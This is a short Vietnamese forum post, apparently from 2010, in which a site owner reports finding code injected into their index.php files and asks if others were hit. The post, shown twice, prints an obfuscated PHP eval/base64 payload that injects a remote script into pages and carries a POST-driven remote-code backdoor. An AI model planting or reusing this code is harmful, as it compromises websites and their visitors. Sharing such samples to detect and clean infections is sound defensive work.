nguaden
17-02-2010, 19:08
hôm nay vào web để ý cái status của FF thấy nó frame 1 cái web mà từ trước tới giờ chưa biết đến view source thì chẳng thấy cái web lạ nào hết vào host check cái source ở mấy file index.php thì thấy bị chèn vào 1 đoạn mã
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygncH Nzd2cnKSl7ZnVuY3Rpb24gcHNzd2coJHMpe2lmKHByZWdfbWF0 Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcy wkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9k ZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW1 5cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8 fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLC R2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYo JGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJi ZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9y ZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJy M8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcm VnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlsw LTldW1wnIj4g***kaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJi Yhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZS gkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1z dHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2 RDQnpjbU05YUhSMGNEb3ZMMnh2ZEhScFpXSnlkVzV1TG1KcGVp OXBiV0ZuWlhNdloybG1hVzFuTG5Cb2NDQStQQzl6WTNKcGNIUS snKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1w cmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLC RzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7 cmV0dXJuJHM7fWZ1bmN0aW9uIHBzc3dnMigkYSwkYiwkYywkZC l7Z2xvYmFsJHBzc3dnMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9u X2V4aXN0cygkcHNzd2cxKSljYWxsX3VzZXJfZnVuYygkcHNzd2 cxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVz KDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdwc3N3Zycpcm V0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7 ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW 5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRp Pj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKT tvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3Bzc3dnJyk7Zm9y KCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWy RpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHBzc3dnbD0oKCRh PUBzZXRfZXJyb3JfaGFuZGxlcigncHNzd2cyJykpIT0ncHNzd2 cyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKT s=')); ?><?php
không biết có ai bị dính như mình ko ha
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygncH Nzd2cnKSl7ZnVuY3Rpb24gcHNzd2coJHMpe2lmKHByZWdfbWF0 Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcy wkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9k ZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW1 5cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8 fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLC R2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYo JGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJi ZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9y ZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJy M8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcm VnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlsw LTldW1wnIj4g***kaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJi Yhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZS gkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1z dHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2 RDQnpjbU05YUhSMGNEb3ZMMnh2ZEhScFpXSnlkVzV1TG1KcGVp OXBiV0ZuWlhNdloybG1hVzFuTG5Cb2NDQStQQzl6WTNKcGNIUS snKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1w cmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLC RzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7 cmV0dXJuJHM7fWZ1bmN0aW9uIHBzc3dnMigkYSwkYiwkYywkZC l7Z2xvYmFsJHBzc3dnMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9u X2V4aXN0cygkcHNzd2cxKSljYWxsX3VzZXJfZnVuYygkcHNzd2 cxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVz KDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdwc3N3Zycpcm V0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7 ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW 5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRp Pj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKT tvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3Bzc3dnJyk7Zm9y KCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWy RpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHBzc3dnbD0oKCRh PUBzZXRfZXJyb3JfaGFuZGxlcigncHNzd2cyJykpIT0ncHNzd2 cyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKT s=')); ?><?php
không biết có ai bị dính như mình ko ha